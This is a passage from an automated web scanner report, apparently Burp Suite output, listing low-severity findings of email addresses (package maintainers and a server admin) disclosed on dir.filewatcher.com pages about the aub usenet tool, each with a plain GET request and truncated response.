X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 231
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.26. http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.3-release/amd64.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/6.3-release/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.27. http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m14cFzBrRTyJJddwL+HG4g"
Content-Length: 25745
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.28. http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.3-release/i386.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/6.3-release/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:34 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.29. http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MrP66mXsA4WtHHC/w3asQw"
Content-Length: 25643
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.30. http://dir.filewatcher.com/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "pAEPFOHU2mnYiuFV7WGw+w"
Content-Length: 25095
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 216
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.31. http://dir.filewatcher.com/d/FreeBSD/7-current/ia64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7-current/ia64.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/7-current/ia64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 228
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.32. http://dir.filewatcher.com/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "L0usVmTHrXrSD7hv8gWhAg"
Content-Length: 23138
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 217
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.33. http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/amd64.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/7.0-release/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:16 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 204
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.34. http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ELLhiiMD7yqGLFeQ0s87kA"
Content-Length: 25796
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 198
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.35. http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/i386.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/7.0-release/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 204
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.36. http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BhgQiQdlEC4RQFMip3u91w"
Content-Length: 25724
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 205
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.37. http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/sparc64.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/7.0-release/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 214
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.38. http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GjJmICQXTmvRx3IXwKzHFg"
Content-Length: 26054
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 203
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.39. http://dir.filewatcher.com/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html

Issue detail

The following email address was disclosed in the response:
  • obrien@NUXI.com

Request

GET /d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "s2mj51RYwAHAE2nf1YJJzg"
Content-Length: 25311
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 233
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
<a href="mailto:obrien@NUXI.com">obrien@NUXI.com</a>
...[SNIP]...

24.40. http://dir.filewatcher.com/d/FreeBSD/distfiles/Other.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/distfiles/Other.0.0.htm

Issue detail

The following email address was disclosed in the response:
  • om@filewatcher.org

Request

GET /d/FreeBSD/distfiles/Other.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 215
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.41. http://dir.filewatcher.com/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cKdin3ZdqrGl07/9m4nYyA"
Content-Length: 21147
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.42. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GJWxiO1o71UMYTNBAno0Ig"
Content-Length: 22842
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.43. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HN2mrHKKSLPiqeLdDv7xng"
Content-Length: 22236
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.44. http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html

Issue detail

The following email address was disclosed in the response:
  • ports@openbsd.org

Request

GET /d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QSjIlz4mHeQV6tMXgQ6s4Q"
Content-Length: 19360
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 186
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
